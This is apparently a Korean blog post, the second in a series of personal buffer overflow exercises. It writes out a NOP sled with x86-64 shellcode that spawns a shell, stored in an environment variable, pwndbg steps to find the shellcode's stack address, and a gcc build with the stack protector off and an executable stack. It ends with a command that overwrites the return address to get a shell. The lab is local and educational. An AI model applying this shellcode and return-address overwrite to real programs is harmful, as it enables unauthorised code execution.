[시스템 해킹] 버퍼 오버플로우 취약점 해킹 실습 (2)

2023.01.25 - [프로젝트/시스템 해킹] - [시스템 해킹] 버퍼 오버플로우 취약점 해킹 실습 (1)

[시스템 해킹] 버퍼 오버플로우 취약점 해킹 실습 (1)

이전 글에 이어서 버퍼 오버플로우 취약점 해킹 실습을 계속 공부한다.

https://youtu.be/e1H8heGtutI

해당 유튜브 영상을 보면서 실습해보도록 한다.

---

#export SHELLCODE=`perl -e 'print "\x90" x 2000, "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

환경변수에 쉘 코드를 넣어본다.

환경변수 자체에 쉘 코드를 심는 것인데, 익스플로잇을 더 쉽게 하기 위해

쉘코드 앞에 임의의 문자를 넣는다.

"\x90" 이라는 NOP를 총 2000개 넣는다.

 

뒤의 쉘 코드는

2023.01.20 - [프로젝트/시스템 해킹] - [시스템 해킹] 쉘 코드 제작 및 익스플로잇 실습

[시스템 해킹] 쉘 코드 제작 및 익스플로잇 실습

 

 

---

#gdb ./overflow

디버깅을 해보도록 한다.

pwndbg> break * main

실행이 되면 breakpoint를 main에다가 건다.

pwndbg> run

그 후 run 을 입력해 실행을 한다.

pwndbg> x/100a $rsp

해당 명령어를 통해 rsp 레지스터를 확인해보면

9090.. 이 담겨있는 부분을 알 수 있다.

0x90들이 끝나면 그 다음 작성했던 쉘 코드가 담겨있다.

왼쪽의 메모리 주소를 보고, 해당 메모리 주소로 리턴하도록 만들어 버퍼 오버플로우를 이용할 수 있다.

pwndbg>quit

pwndbg를 종료하도록 한다.

 

# gcc -fno-stack-protector -mpreferred-stack-boundary=4 -z execstack overflow.c -o overflow

그 후 스택 프로텍터를 실습을 위해 꺼주도록 한다.

 

perl을 이용해 자동으로 매개변수를 넣어주도록 하고,

위의 버퍼 중 0x7f..ef88의 메모리 주소를 이용해 버퍼 오버플로우를 실행하도록 한다.

메모리 주소는 사람마다 다를 수 있다고 생각한다.

 

# ./overflow `perl -e 'print "X" x 24, "\x88\xef\xff\xff\xff\x7f"'`

해당 메모리 주소를 뒤에서부터 두자리식 넣어주면,

성공적으로 쉘을 따낼 수 있다.